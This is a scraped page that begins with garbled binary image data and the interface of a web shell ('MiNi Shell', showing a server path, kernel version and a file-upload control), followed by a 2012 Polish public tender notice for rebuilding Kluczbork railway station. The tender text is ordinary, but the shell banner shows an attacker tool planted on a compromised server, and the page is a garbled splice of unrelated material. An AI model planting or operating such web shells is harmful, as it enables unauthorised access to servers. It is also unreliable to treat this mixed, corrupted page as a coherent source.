JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120601/122225-N-2012.html

<p class="kh_header"><b>Wrocław: WYKONANIE ROBÓT BUDOWLANO - MONTAŻOWYCH DLA  PROJEKTU PN.:
 PRZEBUDOWA DWORCA KOLEJOWEGO KLUCZBORK</b><br>
<b>Numer ogłoszenia: 122225 - 2012; data zamieszczenia: 01.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PKP Spółka Akcyjna Oddział Gospodarowania Nieruchomościami we Wrocławiu , ul. Joannitów 13, 50-525 Wrocław, woj. dolnośląskie, tel. 071 717 13 33, faks 071 717 54 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> nz.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE ROBÓT BUDOWLANO - MONTAŻOWYCH DLA  PROJEKTU PN.:
 PRZEBUDOWA DWORCA KOLEJOWEGO KLUCZBORK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlano-montażowych dla projektu pn. Przebudowa dworca kolejowego Wrocław Kluczbork
Przedmiot zamówienia jest   zadaniem inwestycyjnym o  terminie realizacji do 30.09.2013r. 

Węzeł kolejowy Kluczbork zlokalizowany jest na działkach nr 2/4, AM-3 i 30/6, AM-13 w obrębie ewidencyjnym Kluczbork Miasto, których właścicielem jest Skarb Państwa, a użytkownikiem wieczystym PKP S.A. Warszawa, reprezentowana przez Oddział Gospodarowania Nieruchomościami we Wrocławiu. Budynek stacyjny usytuowany jest w przestrzeni pomiędzy torami linii kolejowych biegnących w przeciwnych kierunkach. Komunikację pieszą z budynku na perony zapewniają estakady o konstrukcji stalowej wykonane nad torami, a dojazd do budynku stacyjnego dla pojazdów kołowych jest możliwy od strony wiaduktu kolejowego. Utwardzony plac przy północno-zachodniej ścianie szczytowej budynku wykorzystany jest także jako parking dla samochodów. Budynek dworca figuruje w wojewódzkim ewidencji zabytków ( wojewódzkim wykazie zabytków ) i objęty jest ochroną konserwatorską na podstawie zapisów miejscowego planu zagospodarowania przestrzennego miasta Kluczbork.


Charakterystyka użytkowa obiektu:
Omawiany obiekt jest  budynkiem wolnostojącym, dwukondygnacyjnym częściowo podpiwniczonym, z dostępnym poddaszem nieużytkowym.
Podstawowe parametry obiektu:
- pow. zabudowy: 849,52 m2
- pow. użytkowa: 2 028,51 m2
- szerokość budynku: 21,44 m
- długość budynku: 40,57m
- wysokość budynku: 9,80m
- kubatura: 10 983,56 m3
Zakres przebudowy

Przebudowa dworca przewiduje podział pomieszczeń pod względem przeznaczenia dla:
- właścicieli dworca (pom. biurowe, ogólnodostępny hol dworca z poczekalnią oraz zaplecze socjalne: wc dla kobiet, mężczyzn, osób niepełnosprawnych, pracowników dworca i pokój socjalny)
- podnajemców obecnie funkcjonujących na terenie budynku (pom. dla rewidentów, drużyn konduktorskich, kasy biletowe, kasy dopłat, ekip sprzątających  
- podnajemców komercyjnych (salonik prasowy, kawiarnia, informacja , pom. hostelowe, sala wielofunkcyjna)
Wszystkie pomieszczenia piwniczne przeznaczono na cele gospodarcze. W części piwnic dostępnej od strony klatki schodowej obsługującej kasy biletowe zlokalizowano pomieszczenia dla kotłowni olejowej wraz z magazynami na zbiorniki z olejem opałowym. Pozostałą podpiwniczoną część budynku od strony drugiej klatki schodowej pozostawiono jako gospodarczą na cele obsługi budynku dworca. Na parterze pozostawiono bez zmian dotychczasową lokalizację holu dworcowego z poczekalnią i przedsionkami oraz kasy biletowe. Obok pom. kas przewidziano kasy dopłat konduktorskich wraz z węzłem sanitarnym i aneksem socjalnym. W przestrzeni holu wyodrębniono miejsca dla skrytek bagażowych i siedziska dla pasażerów oraz powiększono poczekalnię. Na parterze przewidziano również dwa pomieszczenia biurowe wraz z węzłem sanitarnych dla zarządzających budynkiem dworca. Przewidziano również trzy pomieszczenia tzw. komercyjne na wynajem z przeznaczeniem np. dla informacji miejskiej oraz saloniku prasowego z kawiarnią wydającą gorące napoje dla pasażerów.
Przedsionek od strony jednego z wejść bocznych jest jedynym dostępnym pomieszczeniem dla pasażerów po godz. 22-giej i będzie pełnił pełni funkcję tzw. poczekalni nocnej - przewidziano w jego sąsiedztwie zgrupowanie pom. sanitarnych: wc męski, damski, dla niepełnosprawnych z możliwością przewijania niemowląt oraz pom. socjalne i wc dla pracowników dworca.
W sąsiedztwie tych pomieszczeń zlokalizowano również pom. dla podnajemców tj dla ekip sprzątających. Pozostałe pomieszczenia na parterze przeznaczono pod wynajem dla celów komercyjnych (sala wielofunkcyjna z zapleczem).
Klatka schodowa od strony kas biletowych pozostała bez zmian. Natomiast druga klatka schodowa ulegnie przebudowie ze względu na niespełnienie przez nią wymaganych obecnie warunków ewakuacji (zabiegowe stopnie i ich duża wysokość). Po przebudowie będzie klatką trzybiegową.
Na I piętrze zlokalizowano zespoły pomieszczeń przeznaczonych dla podnajemców (drużyn konduktorskich, rewidentów i pracowników SOK) dostępnych z istn. klatki schodowej.
W skład pom. przeznaczonych dla pracowników SOK wchodzi szatnia dla 23 osób wraz z umywalnią.
Pom. dla ekip konduktorskich to: pom. biurowe, pom dla dyspozytora, szatnia dla kobiet (17 osób - praca na 3 zmiany) wraz z umywalnią i wc, szatnia dla mężczyzn (76 osób - praca na trzy zmiany) wraz z wc i umywalnią, pom. socjalne oraz pom. oczekiwań dla konduktorów.
Pozostałe pomieszczenia na I piętrze przeznaczono na cele komercyjne pod wynajem.
W części budynku od strony drugiej klatki schodowej zaprojektowano również pom. komercyjne z przeznaczeniem na hostel (1 pokój -3os. 2 pokoje -2os. 1 pokój -1os.) z węzłem sanitarnym i aneksem kuchennym.   
Budynek dworca znajduje się w Gminnej Ewidencji budynków podlegającej ochronie Wojewódzkiego Urzędu Ochrony Zabytków w Opolu.
Z prac wymagających od wykonawcy specjalistycznych kwalifikacji do ich wykonania należy wymienić: przywrócenie dawnego wyglądu licowaniu zewnętrznych ścian, odtworzenie dawnych zadaszeń nad drzwiami wejściowymi do budynku dworca łącznie ze stalowymi elementami ozdobnymi, zmianę obecnego pokrycia zadaszenia nad wejściem głównym łącznie ze wzmocnieniem konstrukcji wsporczej; wykonanie i zamontowanie zegara w ścianie szczytowej budynku z odtworzonym; na tarczy liternictwem i wskazówkami stosowanymi pod koniec XIX wieku; renowację zachowanych drzwi wejściowych prowadzących z peronu do głównej klatki schodowej łącznie z przeprowadzeniem prac stratygraficznych powłoki malarskiej; odtworzenie elementów ozdobnych widocznych obecnie na słupkach i ślemieniach okien podlegających wymianie; przywrócenie dawnej kolorystyki stolarki, krat i balustrad biegów schodowych; odtworzenie ozdobnej balustrady wokół świetlika dachowego; odtworzenie - w miarę możliwości - zewnętrznych malowideł tynku znajdujących się nad oknami; wymianę płytek podłogowych i ściennych przy zachowaniu ich dawnego wzoru, wymiarów i koloru.
Dla przywrócenia wyglądu elewacji budynku z okresu budowy należy wykonać następujące prace: 
Oczyścić zewnętrzną powierzchnię ścian z powłok utworzonych przez kurz i sadzę przy użyciu urządzeń do rotacyjnego strumieniowania i delikatnych materiałów ściernych. Zerodowane powierzchnie cegieł i kształtek elewacyjnych należy usunąć ręcznie szczotkami, dolne powierzchnie cokołu i miejsca mokre należy odsolić przy użyciu odpowiednich kompresów usuwanych nie wcześniej niż po 3 tygodniach od ich nałożenia. brakujące lub uszkodzone kształtki i cegły zastąpić nowymi wykonanymi w cegielni, faktura i wybarwienie czerepu dorabianych elementów musi być bezwzględnie dostosowana do istniejącej licówki, niewielkie ubytki w powierzchni cegieł należy wzmocnić preparatem opartym na estrach kwasu krzemowego i uzupełnić odpowiednią zaprawą renowacyjną dostosowaną kolorem do pierwotnego wyglądu lica ściany. Warunek ten dotycz także zapraw uzupełniający spoiny, Scalenie kolorystyczne restaurowanej powierzchni będzie wymagało zastosowania techniki laserunkowej pw celu zabezpieczenia przed wnikaniem wody powierzchnie elewacji należy zaimpregnować środkiem hydrofobizującym opartym na małocząsteczkowych silanach i siloksanach.
Dla usunięcia zawilgocenia licówki ścian i zagrzybionych tynków w piwnicach należy: udrożnić istniejące odpływy z rur spustowych poprzez przepłukanie pod ciśnieniem (wysokociśnieniowe urządzenie WUKO z odsysaniem) wszystkich przykanalików instalacji deszczowej; usunąć tynki ze ścian i stropów piwnic, a ich powierzchnie osuszyć i posmarować preparatem grzybobójczym dopuszczonym do stosowania w magazynach żywności; zapewnić wentylację grawitacyjną pomieszczeń piwnicznych; wykonać od wewnątrz tynki renowacyjne;  wykonać osłonę przeciwwilgociową ścian zewnętrznych z bentonitu lub z folii kubełkowej mocowanej do ścian w wykopach.
Instalacja centralnego ogrzewania jako instalacja wodna, dwururowa w obiegu wymuszonym o temperaturze 70/55oC. Źródłem ciepła dla instalacji jest kotłownia zlokalizowana w piwnicy. Czynnik grzewczy podawany będzie z rozdzielacza do poszczególnych obiegów. Odbiornikami ciepła będą grzejniki konwekcyjne, stalowe, płytowe z ożebrowaniem Konwekcyjnym zaopatrzone w głowice termoregulacyjne.
Do budynku doprowadzone jest obecnie przyłącze wodociągowe wykonane z rur PE. Przyłącze to posiada wodomierz. Nowe przewody prowadzone będą w przestrzeni nad sufitem podwieszanym oraz w warstwach podłogowych i w bruzdach ściennych. Woda zimna zasilać będzie w budynku przybory sanitarne i podgrzewacz wody ciepłej. Za wodomierzem głównym na przyłączu wody zostanie zainstalowany zawór antyskażeniowy. W budynku przewidziano, z rur stalowych, instalację przeciwpożarową, hydrantową wyposażoną w hydranty DN 25mm z wężem półsztywnym długości 30m. Dla zapewnienia na zaworze hydrantowym ciśnienia co najmniej 0,2MPa przewidziano zastosowanie urządzenia podnoszącego ciśnienie w instalacji hydrantowej.
Woda ciepła wytwarzana będzie centralnie w kotłowni. Przewody rurowe ze stali nierdzewnej prowadzone będą w warstwach podłogowych, w bruzdach ściennych i w przestrzeni międzystropowej.
Do budynku doprowadzone są przyłącza kanalizacji sanitarnej. Przewiduje się wykonanie wewnątrz budynku nowych instalacji z rur kanalizacyjnych z PVC.
Instalacja zostanie rozprowadzona po budynku pionami kanalizacyjnymi prowadzonymi w szachtach instalacyjnych lub po ścianach.
Ścieki sanitarne, bytowe będą odbierane ze wszystkich przyborów sanitarnych.
Na wszystkich pionach kanalizacyjnych zamontować należy czyszczaki i typowe kominki wentylacyjne ponad dachem.
Ogólnodostępne dla pasażerów pomieszczenia usytuowane na parterze budynku zostały dostosowane do korzystania z nich przez osoby niepełnosprawne. Przy dwóch głównych wejściach z peronów są pochylnie oraz w zespole sanitarnym zostało dodatkowo przewidziane wc dla niepełnosprawnych.
Do rozprowadzenia instalacji elektrycznych zamontować nad sufitami podwieszanymi wzdłuż ścian korytka kablowe. W pokojach biurowych i ciągach komunikacyjnych przewody wciągać do rurek PCV, układanych na konstrukcjach sufitów podwieszanych, a zejścia do osprzętu elektrycznego na ścianach układać w bruzdach pod tynkiem, w przejściach między kondygnacjami w rurach osłonowych.
Oprawy oświetleniowe jarzeniowe w ciągach komunikacyjnych i w pomieszczeniach biurowych muszą być mocowane do sufitów podwieszanych
Plac dworcowy znajduję się przed budynkiem dworca od strony ściany szczytowej w elewacji północno-zachodniej. Remont placu dworcowego nie zmienia jego obecnej funkcji a jedynie poprawia funkcjonalność, estetykę, uporządkowuje tereny zielone. Wyznaczono 39 miejsc postojowych oraz 2 miejsca dla osób niepełnosprawnych położonych jak najbliżej wejścia głównego do dworca. W pobliżu wejścia i peronu pn.-zach. usytuowano dodatkowo oznakowane kopertą 3 miejsca dla wysiadających dla podróżych. Od strony peronu pn.-wsch. wydzielono utwardzone miejsce dla jednośladów w postaci stojaków dla rowerów. Przyjęto naprawę nawierzchni placu poprzez wykonanie nawierzchni z betonu asfaltowego ułożonego na uprzednio zfrezowanej warstwie istn. asfaltu i istn. kostce brukowej i wyznaczeniu na niej zarówno miejsc postojowych jak i dróg komunikacyjnych. W celu komunikacji potrzebnej do obsługi pozostałych budynków usytuowanych na międzytorzu, przewidziano wjazd na perony z parkingu od strony północno - zachodniej. W pobliżu tego wjazdu wygrodzono siatką istn. miejsce na zbiorniki do gromadzenia odpadów. Część placu położoną bezpośrednio przed wejściem głównym przeznaczono tylko dla ruchu pieszego i nadano mu reprezentacyjny charakter wykonując go z kostki kamiennej granitowej ułożonej na podsypce piaskowo - cem. i podbudowie z kruszywa łamanego. Przewiduje się uporządkowanie istn. zieleni. Odtworzenie dwóch symetrycznie rozmieszczonych na osi wejścia głównego klombów trawiastych z roślinami zimozielonymi. Od strony peronu pn-wsch. zaraz za stojakami na rowery przewidziano wykonanie chodnika z kostki kamiennej granitowej i klombów trawiastych. Wokół projektowanych klombów trawiastych jak i wokół samego budynku dworca usytuowano ławki i kosze na śmieci.
Szczegółowy zakres przebudowy zawarty jest w projekcie budowlanym , projektach wykonawczych branżowych, specyfikacjach techniczne wykonania i odbioru robót ,przedmiar robót  

Uwaga: W wydzielonej części dworca na okres przebudowy dworca należy przygotować czasową lokalizację kas biletowych i tymczasową poczekalnię wraz z wykorzystaniem istniejących sanitariatów dla podróżnych na potrzeby pasażerów. wg. rys 1/B projektu architektoniczno-budowlanego. Ww prace uwzględnione zostały w przedmiarze robót budowlanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.13.00-1, 45.21.00.00-2, 45.32.00.00-6, 45.30.00.00-0, 45.40.00.00-1, 45.11.12.91-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 140 000 PLN  (słownie sto czterdzieści tysięcy 00/100 PLN)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich pięciu  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej dwa  zamówienia polegające na realizacji robót budowlano-montażowych, na obiekcie budowlanym w postaci budynku użyteczności publicznej w rozumieniu przepisów  rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U.nr 75 poz. 690 ze zm.)    na obiekcie wpisanym do ewidencji wojewódzkiego konserwatora zabytków nie mniejszej niż  4 000.000 złotych brutto lub równowartość w innych walutach, 
oraz   jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał  co najmniej dwa zamówienia polegające na realizacji robót budowlano-montażowych na obiekcie wpisanym do ewidencji wojewódzkiego konserwatora zabytków o wartości robót budowlano-montażowych nie mniejszej niż 4 000.000 PLN brutto lub równowartość w innych walutach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponować Personelem do wykonania 
przedmiotu  Zamówienia , który  składa się na kluczowy zespół ekspertów, zgodnie z poniższym wyszczególnieniem:
Eksperci:
-	Kierownik Budowy powinien posiadać wyższe wykształcenie techniczne, przynajmniej 5-letnie doświadczenie na stanowiskach kierowniczych, przy realizacji robót budowlano-montażowych na obiekcie użyteczności publicznej w rozumieniu przepisów  rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U.nr 75 poz. 690 ze zm.), a także uprawnienia do kierowania budową i robotami oraz nadzorowania i kontrolowania robót w specjalności konstrukcyjno - budowlanej bez ograniczeń zgodnie z wymaganiami ustawy Prawo budowlane (tekst jednolity Dz. U. z 2006 r., Nr 156, poz. 1118, z późn. zmianami) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa oraz zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001, Nr 5, poz. 42 ze zm.) łącznie z uprawnieniami do wykonywania nadzoru inwestorskiego przy zabytkach nieruchomych - określonymi w Rozporządzeniu Ministra Kultury z dnia 9 czerwca 2004r. (Dz.U. z 2004r. Nr 150 poz. 1579) oraz praca przy co najmniej 2-ch obiektach budowlanych  wpisanych do ewidencji wojewódzkiego konserwatora zabytków.
-Kierownik robót elektrycznych - wymagane uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych wraz z aktualnym wpisem na listę członków właściwej izby samorządu zawodowego 
-Kierownik robót instalacyjnych - wymagane uprawnienia instalacyjne w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnych wraz z aktualnym wpisem na listę członków właściwej izby samorządu zawodowego 
-Kierownik robót telekomunikacyjnych - wymagane uprawnienie telekomunikacyjne wraz z aktualnym wpisem na listę członków właściwej izby samorządu zawodowego 
-Kierownika robót drogowych - wymagane uprawnienie do kierowania robotami budowlanymi o specjalności drogowej wraz z aktualnym wpisem na listę członków właściwej izby samorządu zawodowego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadać średniorocznie co najmniej 15 zatrudnionych  pracowników, w tym 5 osób personelu kierowniczego, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadać średniorocznie co najmniej 15 zatrudnionych  pracowników, w tym 5 osób personelu kierowniczego, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	posiadać środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 3  000 000  złotych lub równowartość w innych walutach.
2)	posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem niniejszego  zamówienia na kwotę nie mniejszą niż 5 000.000 złotych lub równowartość w innych Walutach.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
